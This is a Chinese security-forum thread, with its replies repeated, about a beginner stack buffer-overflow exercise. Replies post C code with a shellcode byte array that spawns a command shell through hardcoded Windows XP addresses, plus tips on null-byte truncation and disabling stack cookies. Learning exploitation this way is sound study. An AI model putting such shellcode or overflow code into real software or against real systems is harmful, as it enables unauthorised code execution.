最简单的缓冲区溢出求助？-付费问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (8)
liuweilie 雪币： 316 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 36 粉丝 0 关注私信	liuweilie 2 楼弹出cmd窗口部分的shellcode代码我已经测试过，可以运行。。。 2011-9-26 14:24 0
孟贤雪币： 414 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 261 粉丝 1 关注私信	孟贤 3 楼编译环境是? 是Debug版还是Release版? 2011-9-26 14:40 0
levizhou 雪币： 188 活跃值： (85) 能力值： ( LV5，RANK：60 ) 在线值：发帖 23 回帖 154 粉丝 0 关注私信	levizhou 1 4 楼 #include <stdio.h> #include <string.h> char name[] = { 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x12,0x45,0xfa,0x7f, 0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56, 0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44, 0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81, 0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7, 0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC, 0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93, 0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D }; void overrun( ) { char output[8]; strcpy(output, name); } int main() { /strcpy(output, name);/ overrun(); char output[8]; for(int i=0;i<8&&output;i++) printf("\\0x%x",output); return 0; } 我这里调试下发现是可以进入shellcode 的没明白你的 cmd窗口是指什么？多出来一个么这个不能只有自带地那个你现在写的是需要main（）函数退出时才执行shellcode ps：需要 release编译工程配置里去掉cookie安全检查 2011-9-26 15:15 0
cherryEx 雪币： 128 活跃值： (27) 能力值： ( LV5，RANK：60 ) 在线值：发帖 11 回帖 195 粉丝 0 关注私信	cherryEx 1 5 楼不成功才有意思，所以才要耐心的单步debug，这样肯定能真相大白，祝好运 2011-9-26 15:52 0
一心n 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	一心n 6 楼不是很清楚不好意思。。。 2011-9-26 16:02 0
levizhou 雪币： 188 活跃值： (85) 能力值： ( LV5，RANK：60 ) 在线值：发帖 23 回帖 154 粉丝 0 关注私信	levizhou 1 7 楼 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x12,0x45,0xfa,0x7f, 0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56, 0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44, 0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81, 0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7, 0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC, 0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93, 0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D 搂主你用的是字符处理函数进行溢出遇到00 截断了用memcpy 试一下估计就好用了或者你自己把00替换，然后再写解码shellcode 不过我将你name中实际需要运行的部分声明成 void fn（）来执行都会crash 2011-9-26 16:22 0
seuer 雪币： 139 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 277 粉丝 0 关注私信	seuer 8 楼这个不清楚，帮你顶！ 2011-9-26 16:38 0
haw 雪币： 16 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 112 粉丝 0 关注私信	haw 9 楼用OD调试一下不就知道了 2011-9-28 11:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (8)
liuweilie 雪币： 316 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 36 粉丝 0 关注私信	liuweilie 2 楼弹出cmd窗口部分的shellcode代码我已经测试过，可以运行。。。 2011-9-26 14:24 0
孟贤雪币： 414 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 261 粉丝 1 关注私信	孟贤 3 楼编译环境是? 是Debug版还是Release版? 2011-9-26 14:40 0
levizhou 雪币： 188 活跃值： (85) 能力值： ( LV5，RANK：60 ) 在线值：发帖 23 回帖 154 粉丝 0 关注私信	levizhou 1 4 楼 #include <stdio.h> #include <string.h> char name[] = { 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x12,0x45,0xfa,0x7f, 0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56, 0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44, 0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81, 0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7, 0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC, 0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93, 0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D }; void overrun( ) { char output[8]; strcpy(output, name); } int main() { /strcpy(output, name);/ overrun(); char output[8]; for(int i=0;i<8&&output;i++) printf("\\0x%x",output); return 0; } 我这里调试下发现是可以进入shellcode 的没明白你的 cmd窗口是指什么？多出来一个么这个不能只有自带地那个你现在写的是需要main（）函数退出时才执行shellcode ps：需要 release编译工程配置里去掉cookie安全检查 2011-9-26 15:15 0
cherryEx 雪币： 128 活跃值： (27) 能力值： ( LV5，RANK：60 ) 在线值：发帖 11 回帖 195 粉丝 0 关注私信	cherryEx 1 5 楼不成功才有意思，所以才要耐心的单步debug，这样肯定能真相大白，祝好运 2011-9-26 15:52 0
一心n 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	一心n 6 楼不是很清楚不好意思。。。 2011-9-26 16:02 0
levizhou 雪币： 188 活跃值： (85) 能力值： ( LV5，RANK：60 ) 在线值：发帖 23 回帖 154 粉丝 0 关注私信	levizhou 1 7 楼 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x12,0x45,0xfa,0x7f, 0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56, 0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44, 0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81, 0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7, 0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC, 0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93, 0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D 搂主你用的是字符处理函数进行溢出遇到00 截断了用memcpy 试一下估计就好用了或者你自己把00替换，然后再写解码shellcode 不过我将你name中实际需要运行的部分声明成 void fn（）来执行都会crash 2011-9-26 16:22 0
seuer 雪币： 139 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 277 粉丝 0 关注私信	seuer 8 楼这个不清楚，帮你顶！ 2011-9-26 16:38 0
haw 雪币： 16 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 112 粉丝 0 关注私信	haw 9 楼用OD调试一下不就知道了 2011-9-28 11:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[旧帖] 最简单的缓冲区溢出求助？ 0.00雪花